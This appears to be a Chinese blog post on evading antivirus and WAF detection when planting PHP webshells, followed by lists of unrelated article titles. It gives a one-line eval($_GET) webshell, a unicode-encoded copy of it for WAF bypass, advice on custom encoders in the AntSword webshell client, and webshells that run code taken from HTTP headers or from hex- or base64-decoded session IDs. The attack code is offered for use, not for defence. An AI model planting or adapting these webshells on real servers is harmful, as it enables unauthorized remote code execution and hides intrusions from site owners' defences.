GetShell 常用免杀大法

一、编码大法

(1).一句话马子本身采用编码

原文:<?php @eval($_GET(a)):?>

转码后:在提交的post的时候可以直接使用\u0026\u006c\u0074\u003b\u003f\u0070\u0068\u0070\u0020\u0040\u0065\u0076\u0061\u006c\u0028\u0024\u005f\u0047\u0045\u0054\u0028\u0061\u0029\u0029\u003a\u003f\u0026\u0067\u0074\u003b

(2),蚁剑链接时编码

蚁剑在getshell的时候,可以选取使用编码器和解码器,这个时候可以使用自己的独家编码器进行实际的操作,并进行花式绕过waf。蚁剑的编码器是采用的js语言进行编写的,简易操作。

二、花招大法

(1).通过getallheaders()来获取shell

<?php

	echo 1;

	print(pos(getallheaders()));

	eval(pos(getallheaders()));

	?>

这样配置,密码是1;

(2)同理可以使用sessionid来操作,同时搭配编码器,这就很舒服了。

<?php eval(hex2bin(session_id(session_start())));?>

这里的hex2bin可以改为base64

最新文章

  1. Spring4读书笔记(1)-模块
  2. Java 8 Stream API详解--转
  3. 小米note3,华为手机,软键盘弹出之后,页面上定位的元素布局会乱掉
  4. JavaScript获取onclick、onchange等事件值的代码
  5. WCF 客户端调用几种方式
  6. python 装 ez_setup.py 出错
  7. 创建类模式(一):工厂方法(Factory Method)
  8. COJ 0986 WZJ的数据结构(负十四) 区间动态k大
  9. 採集和输出 DeckLink Studio 4K
  10. Spring IOC的描述和Spring的注解(转)
  11. hdu 4034 Graph
  12. 学习Java 以及对几大基本排序算法(对算法笔记书的研究)的一些学习总结(Java对算法的实现持续更新中)
  13. Spring Boot启动过程(七):Connector初始化
  14. 解决arcgis javascript textsymbol不支持多行文本标注的问题
  15. 自动化运维—tomcat服务起停(mysql+shell+django+bootstrap+jquery)
  16. C语言实现牛顿迭代法解方程
  17. SQL注入渗透实战
  18. MarkDown学习——基础用法
  19. 苹果企业版签名分发相关问题,蒲公英签名,fir.im分发,安装ipa设置信任
  20. 第一次参加acm区域赛

热门文章

  1. 自动化管理平台rundeck的安装方法
  2. 4. 上新了Spring,全新一代类型转换机制
  3. Docker 部署 _实现每日情话 定时推送(apscheduler)
  4. 主数据管理(MDM)的6大层级简述,你不可不知的数据治理参考!
  5. 寻找两个数组中的公共元素Java程序代码
  6. Ubuntu命令集(持续更新)
  7. windows 任何软件出现异常有日志 w3wp.exe [10608]中发生了未处理的Microsoft .Net Framework异常
  8. 实验3 C语言分支语句和循环语句编程应用(友好猜日期^_^)
  9. 配置文件中配置集合类(Map、list)@Value注入map、List
  10. 【WPF】 问题总结-RaidButton修改样式模板后作用区域的变化